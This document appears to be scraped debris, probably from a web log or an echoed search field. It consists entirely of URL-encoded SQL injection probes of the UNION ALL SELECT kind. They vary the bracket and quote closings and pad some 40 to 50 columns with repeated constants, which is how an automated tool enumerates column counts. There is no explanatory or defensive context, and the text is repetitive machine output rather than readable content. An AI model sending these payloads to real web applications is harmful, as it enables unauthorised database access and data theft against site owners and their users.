-4373%29%20UNION%20ALL%20SELECT%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%2C%204658%23%20AND%20%285182%3D5182 -6536%29%20UNION%20ALL%20SELECT%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%2C%205590%23%20AND%20%287799%3D7799 -4576%29%20UNION%20ALL%20SELECT%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%2C%203395%23%20AND%20%289112%3D9112 -4563%29%29%20UNION%20ALL%20SELECT%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%2C%204973%23%20AND%20%28%282862%3D2862 -1506%29%29%20UNION%20ALL%20SELECT%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%2C%207699%23%20AND%20%28%286309%3D6309 -5504%29%29%20UNION%20ALL%20SELECT%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%2C%202451%23%20AND%20%28%283592%3D3592 -2715%29%29%20UNION%20ALL%20SELECT%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%2C%206206%23%20AND%20%28%285451%3D5451 -9960%29%29%20UNION%20ALL%20SELECT%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%2C%203228%23%20AND%20%28%285488%3D5488 -1427%29%29%20UNION%20ALL%20SELECT%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%2C%205119%23%20AND%20%28%285357%3D5357 -6173%29%29%20UNION%20ALL%20SELECT%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%2C%203384%23%20AND%20%28%283895%3D3895 -2410%29%29%20UNION%20ALL%20SELECT%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%2C%208696%23%20AND%20%28%288867%3D8867 -7681%29%29%20UNION%20ALL%20SELECT%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%2C%207875%23%20AND%20%28%285040%3D5040 -2662%29%29%20UNION%20ALL%20SELECT%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%2C%207133%23%20AND%20%28%286663%3D6663 -6538%29%29%29%20UNION%20ALL%20SELECT%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%2C%207680%23%20AND%20%28%28%289635%3D9635 -6341%29%29%29%20UNION%20ALL%20SELECT%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%2C%204594%23%20AND%20%28%28%286088%3D6088 -7328%29%29%29%20UNION%20ALL%20SELECT%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%2C%205325%23%20AND%20%28%28%281278%3D1278 -2274%29%29%29%20UNION%20ALL%20SELECT%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%2C%209548%23%20AND%20%28%28%281486%3D1486 -6678%29%29%29%20UNION%20ALL%20SELECT%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%2C%208705%23%20AND%20%28%28%288411%3D8411 -9388%29%29%29%20UNION%20ALL%20SELECT%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%2C%209944%23%20AND%20%28%28%285541%3D5541 -9422%29%29%29%20UNION%20ALL%20SELECT%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%2C%209649%23%20AND%20%28%28%284333%3D4333 -2800%29%29%29%20UNION%20ALL%20SELECT%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%2C%207106%23%20AND%20%28%28%288275%3D8275 -9907%29%29%29%20UNION%20ALL%20SELECT%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%2C%203352%23%20AND%20%28%28%285405%3D5405 -2178%29%29%29%20UNION%20ALL%20SELECT%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%2C%206778%23%20AND%20%28%28%281692%3D1692 -2832%20UNION%20ALL%20SELECT%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%2C%209278%23 -1053%20UNION%20ALL%20SELECT%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%2C%205180%23 -8591%20UNION%20ALL%20SELECT%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%2C%208257%23 -6397%20UNION%20ALL%20SELECT%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%2C%201804%23 -5040%20UNION%20ALL%20SELECT%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%2C%206514%23 -8073%20UNION%20ALL%20SELECT%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%2C%205128%23 -6347%20UNION%20ALL%20SELECT%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%2C%202293%23 -1969%20UNION%20ALL%20SELECT%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%2C%208328%23 -4032%20UNION%20ALL%20SELECT%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%2C%202874%23 -9792%20UNION%20ALL%20SELECT%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%2C%204689%23 -4103%27%29%20UNION%20ALL%20SELECT%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%2C%201353%23%20AND%20%28%27UzJr%27%3D%27UzJr -2092%27%29%20UNION%20ALL%20SELECT%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%2C%209262%23%20AND%20%28%27aqIW%27%3D%27aqIW -5738%27%29%20UNION%20ALL%20SELECT%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%2C%204217%23%20AND%20%28%27sEJd%27%3D%27sEJd -4261%27%29%20UNION%20ALL%20SELECT%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%2C%205621%23%20AND%20%28%27jBVu%27%3D%27jBVu -5363%27%29%20UNION%20ALL%20SELECT%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%2C%203417%23%20AND%20%28%27DEDa%27%3D%27DEDa -7016%27%29%20UNION%20ALL%20SELECT%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%2C%203936%23%20AND%20%28%27hIZI%27%3D%27hIZI -9095%27%29%20UNION%20ALL%20SELECT%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%2C%202809%23%20AND%20%28%27Lzxk%27%3D%27Lzxk -5943%27%29%20UNION%20ALL%20SELECT%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%2C%208935%23%20AND%20%28%27OlBz%27%3D%27OlBz -9220%27%29%20UNION%20ALL%20SELECT%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%2C%201655%23%20AND%20%28%27yxjb%27%3D%27yxjb -9322%27%29%20UNION%20ALL%20SELECT%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%2C%203692%23%20AND%20%28%27nZKv%27%3D%27nZKv -7499%27%29%29%20UNION%20ALL%20SELECT%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%2C%203018%23%20AND%20%28%28%27CmIX%27%3D%27CmIX -4385%27%29%29%20UNION%20ALL%20SELECT%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%2C%208244%23%20AND%20%28%28%27XzgR%27%3D%27XzgR -2024%27%29%29%20UNION%20ALL%20SELECT%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%2C%209727%23%20AND%20%28%28%27Xdhz%27%3D%27Xdhz -6150%27%29%29%20UNION%20ALL%20SELECT%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%2C%208719%23%20AND%20%28%28%27EcaQ%27%3D%27EcaQ -4928%27%29%29%20UNION%20ALL%20SELECT%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%2C%203302%23%20AND%20%28%28%27ozQi%27%3D%27ozQi 